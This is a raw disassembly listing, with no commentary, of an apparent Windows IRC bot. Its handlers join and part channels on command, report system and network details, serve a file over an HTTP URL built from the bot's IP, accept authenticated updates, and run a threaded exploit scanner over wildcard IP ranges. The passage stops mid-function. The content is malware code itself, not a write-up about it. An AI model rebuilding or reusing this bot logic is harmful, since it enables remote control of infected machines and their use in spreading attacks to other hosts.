sub_4019F3 proc near ; DATA XREF: fabskl8p:off_420BCCo
push 4B8h
mov eax, offset loc_41CACE
call sub_4049E5
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4C0h], eax
mov [ebp-4BCh], edi
jl loc_401BFF
mov esi, 0BFh
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407F20
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407F20
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41BDFF
push 0C0h
lea esi, [ebp-0D0h]
mov ebx, offset dword_426E78
call sub_419F0A
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401A8F
cmp byte_426C0A, 0
jz loc_401C15
loc_401A8F: ; CODE XREF: sub_4019F3+8Dj
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401A9B: ; CODE XREF: sub_4019F3+C0j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401AB9
test dl, dl
jz short loc_401AB5
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401AB9
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401A9B
loc_401AB5: ; CODE XREF: sub_4019F3+B0j
xor eax, eax
jmp short loc_401ABE
; ---------------------------------------------------------------------------
loc_401AB9: ; CODE XREF: sub_4019F3+ACj
; sub_4019F3+B8j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401ABE: ; CODE XREF: sub_4019F3+C4j
test eax, eax
jnz loc_401BF2
push 327h
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407F20
push dword ptr [ebp-4C0h]
mov esi, offset dword_420B58
push esi
mov edi, 0FFh
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402EBA
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_401B02: ; CODE XREF: sub_4019F3+114j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B02
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402EBA
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_401B33: ; CODE XREF: sub_4019F3+145j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B33
mov ebx, [ebp-4BCh]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402EBA
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_401B66: ; CODE XREF: sub_4019F3+178j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B66
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402EBA
lea eax, [ebp-295h]
add esp, 10h
lea ecx, [eax+1]
loc_401B93: ; CODE XREF: sub_4019F3+1A5j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B93
sub eax, ecx
mov [ebp+eax-295h], dl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 8
mov [ebp-193h], al
mov byte ptr [ebp-195h], 1
mov byte ptr [ebp-194h], 1
call sub_403417
pop ecx
mov [ebp-4BCh], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_401C15
push offset sub_41BF2B
lea ecx, [ebp-4B8h]
mov edi, offset dword_420B64
mov esi, eax
call sub_414887
jmp short loc_401C15
; ---------------------------------------------------------------------------
loc_401BF2: ; CODE XREF: sub_4019F3+CDj
push offset aUpdAuthFailure ; "UPD: Auth Failure."
push dword ptr [ebp-4C0h]
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BFF: ; CODE XREF: sub_4019F3+2Ej
push offset aUpdInvalidArgu ; "UPD: Invalid Arguments."
push eax
loc_401C05: ; CODE XREF: sub_4019F3+20Aj
push dword ptr [ebp+0Ch]
push offset dword_42851C
call sub_417B51
add esp, 10h
loc_401C15: ; CODE XREF: sub_4019F3+96j
; sub_4019F3+1E4j ...
call sub_404A2F
retn 1Ch
sub_4019F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C1D proc near ; DATA XREF: fabskl8p:off_420C40o
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push edi
xor edi, edi
inc edi
cmp [ebp+arg_14], edi
jl loc_401CF7
push esi
push 1F8h
call sub_402A14
mov esi, eax
push esi
call sub_402E11
push eax
push 0
push esi
call sub_407F20
add esp, 14h
cmp [ebp+arg_14], edi
jnz short loc_401C81
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_420B58
push esi
call sub_402E11
pop ecx
dec eax
push eax
push esi
call sub_402EBA
mov eax, esi
add esp, 10h
lea edx, [eax+1]
loc_401C73: ; CODE XREF: sub_401C1D+5Bj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_401C73
sub eax, edx
mov [eax+esi], cl
jmp short loc_401CDB
; ---------------------------------------------------------------------------
loc_401C81: ; CODE XREF: sub_401C1D+32j
jl short loc_401CDB
push ebx
mov ebx, [ebp+arg_18]
loc_401C87: ; CODE XREF: sub_401C1D+BBj
cmp edi, 1
jnz short loc_401CA8
push dword ptr [ebx+4]
push offset dword_420B58
push esi
call sub_402E11
pop ecx
dec eax
push eax
push esi
call sub_402EBA
add esp, 10h
jmp short loc_401CC3
; ---------------------------------------------------------------------------
loc_401CA8: ; CODE XREF: sub_401C1D+6Dj
push dword ptr [ebx+edi*4]
push esi
push offset dword_420BD0
push esi
call sub_402E11
pop ecx
dec eax
push eax
push esi
call sub_402EBA
add esp, 14h
loc_401CC3: ; CODE XREF: sub_401C1D+89j
mov eax, esi
lea ecx, [eax+1]
loc_401CC8: ; CODE XREF: sub_401C1D+B0j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401CC8
sub eax, ecx
inc edi
cmp edi, [ebp+arg_14]
mov [eax+esi], dl
jle short loc_401C87
pop ebx
loc_401CDB: ; CODE XREF: sub_401C1D+62j
; sub_401C1D:loc_401C81j
push esi
push offset dword_420BD8
mov edi, offset dword_42851C
call sub_417ABC
push esi
call sub_402F67
add esp, 0Ch
pop esi
jmp short loc_401D07
; ---------------------------------------------------------------------------
loc_401CF7: ; CODE XREF: sub_401C1D+Aj
push offset aQuitIrnPowered ; "QUIT :Irn Powered\r\n"
mov edi, offset dword_42851C
call sub_417ABC
pop ecx
loc_401D07: ; CODE XREF: sub_401C1D+D8j
pop edi
pop ebp
retn 1Ch
sub_401C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D0C proc near ; DATA XREF: fabskl8p:off_420C48o
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
cmp [ebp+arg_14], 1
push edi
jl short loc_401D4A
cmp [ebp+arg_14], 2
mov eax, [ebp+arg_18]
mov edi, offset dword_42851C
jl short loc_401D39
push dword ptr [eax+8]
push dword ptr [eax+4]
push offset aJoinSS ; "JOIN %s %s\r\n"
call sub_417ABC
add esp, 0Ch
jmp short loc_401D62
; ---------------------------------------------------------------------------
loc_401D39: ; CODE XREF: sub_401D0C+16j
push dword ptr [eax+4]
push offset aJoinS ; "JOIN %s\r\n"
call sub_417ABC
pop ecx
pop ecx
jmp short loc_401D62
; ---------------------------------------------------------------------------
loc_401D4A: ; CODE XREF: sub_401D0C+8j
push offset aIInsufficientA ; "I: Insufficient Arguments."
push [ebp+arg_10]
push [ebp+arg_4]
push offset dword_42851C
call sub_417B51
add esp, 10h
loc_401D62: ; CODE XREF: sub_401D0C+2Bj
; sub_401D0C+3Cj
pop edi
pop ebp
retn 1Ch
sub_401D0C endp
; =============== S U B R O U T I N E =======================================
sub_401D67 proc near ; DATA XREF: fabskl8p:off_420C50o
arg_4 = dword ptr 8
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_18 = dword ptr 1Ch
cmp [esp+arg_14], 1
jl short loc_401D8A
mov eax, [esp+arg_18]
push edi
push dword ptr [eax+4]
mov edi, offset dword_42851C
push offset aPartS ; "PART %s\r\n"
call sub_417ABC
pop ecx
pop ecx
pop edi
jmp short locret_401DA4
; ---------------------------------------------------------------------------
loc_401D8A: ; CODE XREF: sub_401D67+5j
push offset aIInsufficientA ; "I: Insufficient Arguments."
push [esp+4+arg_10]
push [esp+8+arg_4]
push offset dword_42851C
call sub_417B51
add esp, 10h
locret_401DA4: ; CODE XREF: sub_401D67+21j
retn 1Ch
sub_401D67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401DA7 proc near ; DATA XREF: fabskl8p:off_420C68o
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 118h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
push ebx
mov [ebp+var_118], eax
push esi
push edi
xor eax, eax
xor ecx, ecx
mov [ebp+var_14], cl
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
push 0FFh
stosb
push ecx
lea eax, [ebp+var_113]
push eax
mov [ebp+var_114], cl
call sub_407F20
push dword_42851C
lea esi, [ebp+var_14]
push 10h
pop ecx
call sub_4197F4
push 100h
lea esi, [ebp+var_114]
mov ebx, offset aVQdD ; "¢³²²²ï¤¹¤"
call sub_419F0A
mov eax, esi
push eax
push dword_4280F4
lea eax, [ebp+var_14]
push eax
push offset aHttpSDS ; "http://%s:%d/%s"
push [ebp+var_118]
push [ebp+arg_4]
push offset dword_42851C
call sub_417B51
mov ecx, [ebp+var_4]
add esp, 30h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn 1Ch
sub_401DA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E4D proc near ; DATA XREF: fabskl8p:off_420CB4o
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_120 = byte ptr -120h
var_20 = word ptr -20h
var_1E = byte ptr -1Eh
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push 0FFFFFFFFh
push offset loc_41CA93
mov eax, large fs:0
push eax
sub esp, 130h
mov eax, dword_423064
xor eax, esp
mov [esp+13Ch+var_14], eax
push ebx
push esi
push edi
mov eax, dword_423064
xor eax, esp
push eax
lea eax, [esp+14Ch+var_C]
mov large fs:0, eax
mov edi, [ebp+arg_10]
mov esi, [ebp+arg_18]
push 104h
lea eax, [esp+150h+var_120]
push 0
push eax
mov [esp+158h+var_13C], edi
call sub_407F20
add esp, 0Ch
push edi
push offset dword_420B58
lea eax, [esp+154h+var_120]
push 0FFh
push eax
call sub_402EBA
lea eax, [esp+15Ch+var_120]
add esp, 10h
lea ecx, [eax+1]
loc_401ECA: ; CODE XREF: sub_401E4D+82j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401ECA
mov ebx, [ebp+arg_4]
sub eax, ecx
cmp [ebp+arg_14], 1
mov [esp+eax+14Ch+var_120], dl
mov [esp+14Ch+var_1E], bl
jl short loc_401F01
push dword ptr [esi+4]
call sub_40416B
pop ecx
push dword ptr [esi+4]
mov word_4354B8, ax
call sub_40416B
pop ecx
jmp short loc_401F0D
; ---------------------------------------------------------------------------
loc_401F01: ; CODE XREF: sub_401E4D+98j
mov ax, word_426C08
mov word_4354B8, ax
loc_401F0D: ; CODE XREF: sub_401E4D+B2j
mov [esp+14Ch+var_20], ax
mov eax, dword_4357BC
mov eax, [eax]
mov [esp+14Ch+var_134], eax
mov eax, offset dword_4357B8
mov [esp+14Ch+var_138], eax
mov [esp+14Ch+var_130], eax
loc_401F2D: ; CODE XREF: sub_401E4D+11Fj
mov eax, dword_4357BC
lea edi, [esp+14Ch+var_130]
lea esi, [esp+14Ch+var_138]
mov [esp+14Ch+var_12C], eax
call sub_40166F
test al, al
jz short loc_401F6E
mov edi, offset off_420C6C
call sub_40164F
mov esi, eax
add esi, 5
push 4
pop ecx
xor eax, eax
repe cmpsb
jz short loc_401F9D
lea edi, [esp+14Ch+var_128]
lea esi, [esp+14Ch+var_138]
call sub_40168C
jmp short loc_401F2D
; ---------------------------------------------------------------------------
loc_401F6E: ; CODE XREF: sub_401E4D+F8j
push 8
call sub_403417
pop ecx
mov [esp+14Ch+var_13C], eax
and [esp+14Ch+var_4], 0
test eax, eax
jz short loc_401FB4
push offset sub_4145BE
lea ecx, [esp+150h+var_120]
mov edi, offset off_420C6C
mov esi, eax
call sub_414887
jmp short loc_401FB4
; ---------------------------------------------------------------------------
loc_401F9D: ; CODE XREF: sub_401E4D+110j
push offset aS4AlreadyRunni ; "S4:Already Running"
push [esp+150h+var_13C]
push ebx
push offset dword_42851C
call sub_417B51
add esp, 10h
loc_401FB4: ; CODE XREF: sub_401E4D+137j
; sub_401E4D+14Ej
mov ecx, [esp+14Ch+var_C]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
mov ecx, [esp+13Ch+var_14]
xor ecx, esp
call sub_402ADC
mov esp, ebp
pop ebp
retn 1Ch
sub_401E4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FDA proc near ; DATA XREF: fabskl8p:off_420CBCo
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 18h
push esi
push edi
push dword_428648
call ds:dword_41D280 ; closesocket
mov eax, dword_4357BC
mov eax, [eax]
mov [esp+20h+var_14], eax
mov eax, offset dword_4357B8
mov [esp+20h+var_18], eax
mov [esp+20h+var_10], eax
loc_402009: ; CODE XREF: sub_401FDA+6Ej
mov eax, dword_4357BC
lea edi, [esp+20h+var_10]
lea esi, [esp+20h+var_18]
mov dword ptr [esp+20h+var_C], eax
call sub_40166F
test al, al
jz short loc_40205D
mov edi, offset off_420C6C
call sub_40164F
mov esi, eax
add esi, 5
push 4
pop ecx
xor eax, eax
repe cmpsb
lea esi, [esp+20h+var_18]
jz short loc_40204A
lea edi, [esp+20h+var_8]
call sub_40168C
jmp short loc_402009
; ---------------------------------------------------------------------------
loc_40204A: ; CODE XREF: sub_401FDA+63j
call sub_40164F
mov eax, [eax]
call sub_4147FF
push offset aS4ThreadStoppe ; "S4: Thread Stopped"
jmp short loc_402062
; ---------------------------------------------------------------------------
loc_40205D: ; CODE XREF: sub_401FDA+47j
push offset aS4NoThreadRunn ; "S4: No Thread Running"
loc_402062: ; CODE XREF: sub_401FDA+81j
push [ebp+arg_10]
push [ebp+arg_4]
push offset dword_42851C
call sub_417B51
add esp, 10h
pop edi
pop esi
mov esp, ebp
pop ebp
retn 1Ch
sub_401FDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40207D proc near ; DATA XREF: fabskl8p:off_420D7Co
var_444 = byte ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = byte ptr -438h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_418 = byte ptr -418h
var_417 = byte ptr -417h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 444h
mov eax, dword_423064
xor eax, esp
mov [esp+444h+var_4], eax
mov eax, [ebp+arg_10]
push ebx
push esi
push edi
mov esi, 0FFh
push esi
mov [esp+454h+var_43C], eax
xor ebx, ebx
lea eax, [esp+454h+var_107]
push ebx
push eax
mov [esp+45Ch+var_108], 0
call sub_407F20
add esp, 0Ch
push esi
lea eax, [esp+454h+var_307]
push ebx
push eax
mov [esp+45Ch+var_308], bl
call sub_407F20
xor eax, eax
mov [esp+45Ch+var_418], bl
lea edi, [esp+45Ch+var_417]
stosd
stosd
stosd
stosw
add esp, 0Ch
push esi
stosb
lea eax, [esp+454h+var_407]
push ebx
push eax
mov [esp+45Ch+var_408], bl
call sub_407F20
add esp, 0Ch
push esi
lea eax, [esp+454h+var_207]
push ebx
push eax
mov [esp+45Ch+var_208], bl
call sub_407F20
add esp, 0Ch
push 8
pop ecx
xor eax, eax
lea edi, [esp+450h+var_438]
rep stosd
lea eax, [esp+450h+var_438]
mov ebx, 100h
push eax
mov [esp+454h+var_440], ebx
call ds:off_41D098
mov edi, [esp+450h+var_430]
mov ecx, [esp+450h+var_42C]
shr edi, 14h
shr ecx, 14h
mov eax, edi
sub eax, ecx
push 1
mov ecx, ebx
lea esi, [esp+454h+var_108]
mov dword ptr [esp+454h+var_444], eax
call sub_41967F
pop ecx
call sub_41ADC3
push 1
push ebx
lea esi, [esp+458h+var_308]
call sub_41964D
push dword_42851C
lea esi, [esp+45Ch+var_418]
push 10h
pop ecx
call sub_4197F4
add esp, 0Ch
lea eax, [esp+450h+var_440]
push eax
lea eax, [esp+454h+var_408]
push eax
call ds:off_41D048
push ebx
lea eax, [esp+454h+var_208]
push eax
call ds:dword_41D0F0 ; GetSystemDirectoryA
call sub_4195CE
push dword_42810C
lea eax, [esp+454h+var_208]
push dword_428108
push dword_428104
push dword_428100
push dword_4280FC
push dword_4280F8
push eax
lea eax, [esp+46Ch+var_408]
push eax
mov eax, esi
push eax
lea eax, [esp+474h+var_308]
push eax
push edi
push dword ptr [esp+47Ch+var_444]
mov esi, offset byte_428650
push dword_428750
lea eax, [esp+484h+var_108]
push esi
push dword_428754
push eax
push offset aSystemSCpuIXS@ ; "System: %s [CPU: %i x %s @ %dMhz] [RAM:"...
push [esp+494h+var_43C]
push [ebp+arg_4]
push offset dword_42851C
call sub_417B51
push 108h
push 0
push esi
call sub_407F20
mov ecx, [esp+4ACh+var_4]
add esp, 5Ch
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402ADC
mov esp, ebp
pop ebp
retn 1Ch
sub_40207D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402242 proc near ; DATA XREF: fabskl8p:off_420D84o
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_10]
push esi
push edi
push dword_42851C
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
push 10h
pop ecx
lea esi, [ebp+var_14]
stosb
call sub_4197F4
pop ecx
mov eax, esi
push eax
call ds:dword_41D264 ; inet_addr
push 2
mov [ebp+var_18], eax
push 4
lea eax, [ebp+var_18]
push eax
call ds:dword_41D224 ; gethostbyaddr
test eax, eax
jnz short loc_4022B2
mov eax, esi
push eax
push offset aNetIpSHostNA ; "Net: IP: %s Host: N/A"
push ebx
push [ebp+arg_4]
push offset dword_42851C
call sub_417B51
add esp, 14h
jmp short loc_4022CE
; ---------------------------------------------------------------------------
loc_4022B2: ; CODE XREF: sub_402242+53j
push dword ptr [eax]
lea eax, [ebp+var_14]
push eax
push offset aNetIpSHostS ; "Net: IP: %s Host: %s"
push ebx
push [ebp+arg_4]
push offset dword_42851C
call sub_417B51
add esp, 18h
loc_4022CE: ; CODE XREF: sub_402242+6Ej
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn 1Ch
sub_402242 endp
; =============== S U B R O U T I N E =======================================
sub_4022DF proc near ; DATA XREF: fabskl8p:off_420ED4o
push 60h
mov eax, offset loc_41CA61
call sub_4049E5
mov eax, [ebp+18h]
mov [ebp-68h], eax
xor eax, eax
mov byte ptr [ebp-30h], 0
lea edi, [ebp-2Fh]
stosd
stosd
stosd
mov ebx, [ebp+20h]
stosw
and dword ptr [ebp-58h], 0
and dword ptr [ebp-48h], 0
stosb
xor eax, eax
mov byte ptr [ebp-20h], 0
lea edi, [ebp-1Fh]
stosd
stosd
stosd
stosw
stosb
or edi, 0FFFFFFFFh
cmp byte_4354AD, 0
mov [ebp-50h], ebx
mov byte ptr [ebp-41h], 0
mov [ebp-5Ch], edi
mov [ebp-60h], edi
mov [ebp-64h], edi
mov [ebp-6Ch], edi
jnz short loc_402346
call sub_41BD7B
test al, al
jz loc_4027F8
loc_402346: ; CODE XREF: sub_4022DF+58j
cmp byte_428414, 0
jnz short loc_40235C
call sub_419545
test al, al
jz loc_4027F8
loc_40235C: ; CODE XREF: sub_4022DF+6Ej
and dword ptr [ebp-54h], 0
mov ecx, offset dword_424528
mov eax, ecx
lea esi, [eax+1]
loc_40236A: ; CODE XREF: sub_4022DF+90j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40236A
jmp short loc_4023B9
; ---------------------------------------------------------------------------
loc_402373: ; CODE XREF: sub_4022DF+DCj
mov edx, [ebx+4]
mov eax, ecx
loc_402378: ; CODE XREF: sub_4022DF+B1j
mov cl, [eax]
cmp cl, [edx]
jnz short loc_402396
test cl, cl
jz short loc_402392
mov cl, [eax+1]
cmp cl, [edx+1]
jnz short loc_402396
inc eax
inc eax
inc edx
inc edx
test cl, cl
jnz short loc_402378
loc_402392: ; CODE XREF: sub_4022DF+A1j
xor eax, eax
jmp short loc_40239A
; ---------------------------------------------------------------------------
loc_402396: ; CODE XREF: sub_4022DF+9Dj
; sub_4022DF+A9j
sbb eax, eax
sbb eax, edi
loc_40239A: ; CODE XREF: sub_4022DF+B5j
test eax, eax
jz short loc_4023BF
inc dword ptr [ebp-54h]
mov ecx, [ebp-54h]
imul ecx, 2Ch
lea ecx, dword_424528[ecx]
mov eax, ecx
lea esi, [eax+1]
loc_4023B2: ; CODE XREF: sub_4022DF+D8j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4023B2
loc_4023B9: ; CODE XREF: sub_4022DF+92j
sub eax, esi
jnz short loc_402373
jmp short loc_4023C4
; ---------------------------------------------------------------------------
loc_4023BF: ; CODE XREF: sub_4022DF+BDj
cmp [ebp-54h], edi
jnz short loc_4023E1
loc_4023C4: ; CODE XREF: sub_4022DF+DEj
push offset aScanUnknownExp ; "Scan: Unknown Exploit."
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push offset dword_42851C
call sub_417B51
add esp, 10h
jmp loc_4027F8
; ---------------------------------------------------------------------------
loc_4023E1: ; CODE XREF: sub_4022DF+E3j
mov esi, [ebx+8]
mov eax, esi
mov ecx, offset a____0 ; "*.*.*.*"
call sub_41987A
test eax, eax
jz short loc_402406
push dword ptr [ebx+0Ch]
mov byte ptr [ebp-41h], 1
call sub_40416B
pop ecx
mov [ebp-4Ch], eax
jmp short loc_402463
; ---------------------------------------------------------------------------
loc_402406: ; CODE XREF: sub_4022DF+113j
push esi
call sub_40416B
pop ecx
push 3
pop edx
cmp [ebp+1Ch], edx
mov [ebp-4Ch], eax
mov [ebp-48h], edx
jl short loc_40245C
mov eax, edx
loc_40241D: ; CODE XREF: sub_4022DF+17Bj
mov ecx, [ebp-50h]
mov eax, [ecx+eax*4]
mov edi, eax
mov esi, offset aA ; "-a"
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_4024AA
mov edi, eax
mov esi, offset aB ; "-b"
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_40245C
mov edi, eax
mov esi, offset aC ; "-c"
mov ecx, edx
xor eax, eax
repe cmpsb
jz short loc_4024B0
inc dword ptr [ebp-48h]
movzx eax, word ptr [ebp-48h]
cmp eax, [ebp+1Ch]
jle short loc_40241D
loc_40245C: ; CODE XREF: sub_4022DF+13Aj
; sub_4022DF+160j
mov dword ptr [ebp-48h], 1
loc_402463: ; CODE XREF: sub_4022DF+125j
; sub_4022DF+1CFj ...
xor eax, eax
loc_402465: ; CODE XREF: sub_4022DF+19Cj
cmp byte_428869[eax], 0
jz short loc_402471
inc dword ptr [ebp-58h]
loc_402471: ; CODE XREF: sub_4022DF+18Dj
add eax, 124h
cmp eax, 0CD50h
jbe short loc_402465
mov ecx, [ebp-58h]
mov eax, 0B4h
sub eax, ecx
cmp eax, [ebp-4Ch]
jnb short loc_4024B9
push eax
push offset aScanNotEnoughT ; "Scan: Not Enough Threads. %d Available."...
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push offset dword_42851C
call sub_417B51
add esp, 14h
jmp loc_4027F8
; ---------------------------------------------------------------------------
loc_4024AA: ; CODE XREF: sub_4022DF+151j
and dword ptr [ebp-48h], 0
jmp short loc_402463
; ---------------------------------------------------------------------------
loc_4024B0: ; CODE XREF: sub_4022DF+16Fj
mov dword ptr [ebp-48h], 2
jmp short loc_402463
; ---------------------------------------------------------------------------
loc_4024B9: ; CODE XREF: sub_4022DF+1ABj
add [ebp-4Ch], ecx
cmp byte ptr [ebp-41h], 0
jz loc_4025E0
mov eax, [ebp-50h]
push dword ptr [eax+8]
lea eax, [ebp-30h]
push offset dword_420B58
push 0Fh
pop ebx
push ebx
push eax
call sub_402EBA
lea eax, [ebp-30h]
add esp, 10h
lea ecx, [eax+1]
loc_4024E7: ; CODE XREF: sub_4022DF+20Dj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4024E7
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_4039B0
add esp, 18h
cmp dword ptr [ebp-5Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_40252F
push offset aX_ ; "x."
push ebx
push eax
call sub_402EBA
add esp, 0Ch
jmp short loc_402541
; ---------------------------------------------------------------------------
loc_40252F: ; CODE XREF: sub_4022DF+23Dj
push dword ptr [ebp-5Ch]
push offset aD_ ; "%d."
push ebx
push eax
call sub_402EBA
add esp, 10h
loc_402541: ; CODE XREF: sub_4022DF+24Ej
cmp dword ptr [ebp-60h], 0FFFFFFFFh
mov esi, offset aSD_ ; "%s%d."
mov edi, offset aSx_ ; "%sx."
lea eax, [ebp-20h]
jnz short loc_402562
push eax
push edi
push ebx
push eax
call sub_402EBA
add esp, 10h
jmp short loc_402574
; ---------------------------------------------------------------------------
loc_402562: ; CODE XREF: sub_4022DF+273j
push dword ptr [ebp-60h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402EBA
add esp, 14h
loc_402574: ; CODE XREF: sub_4022DF+281j
cmp dword ptr [ebp-64h], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_40258B
push eax
push edi
push ebx
push eax
call sub_402EBA
add esp, 10h
jmp short loc_40259D
; ---------------------------------------------------------------------------
loc_40258B: ; CODE XREF: sub_4022DF+29Cj
push dword ptr [ebp-64h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402EBA
add esp, 14h
loc_40259D: ; CODE XREF: sub_4022DF+2AAj
cmp dword ptr [ebp-6Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4025B8
push eax
push offset aSx ; "%sx"
push ebx
push eax
call sub_402EBA
add esp, 10h
jmp short loc_4025CE
; ---------------------------------------------------------------------------
loc_4025B8: ; CODE XREF: sub_4022DF+2C5j
push dword ptr [ebp-6Ch]
push eax
push offset aSD ; "%s%d"
lea eax, [ebp-20h]
push ebx
push eax
call sub_402EBA
add esp, 14h
loc_4025CE: ; CODE XREF: sub_4022DF+2D7j
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_4025D4: ; CODE XREF: sub_4022DF+2FAj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4025D4
jmp loc_4026BC
; ---------------------------------------------------------------------------
loc_4025E0: ; CODE XREF: sub_4022DF+1E1j
push dword_42851C
mov byte ptr [ebp-40h], 0
xor eax, eax
lea edi, [ebp-3Fh]
stosd
stosd
stosd
stosw
push 10h
pop ecx
lea esi, [ebp-40h]
stosb
call sub_4197F4
xor eax, eax
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov eax, esi
push eax
push offset dword_420B58
push 0Fh
pop esi
lea eax, [ebp-30h]
push esi
push eax
call sub_402EBA
lea eax, [ebp-30h]
add esp, 14h
lea ecx, [eax+1]
loc_402627: ; CODE XREF: sub_4022DF+34Dj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402627
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_4039B0
mov eax, [ebp-48h]
add esp, 18h
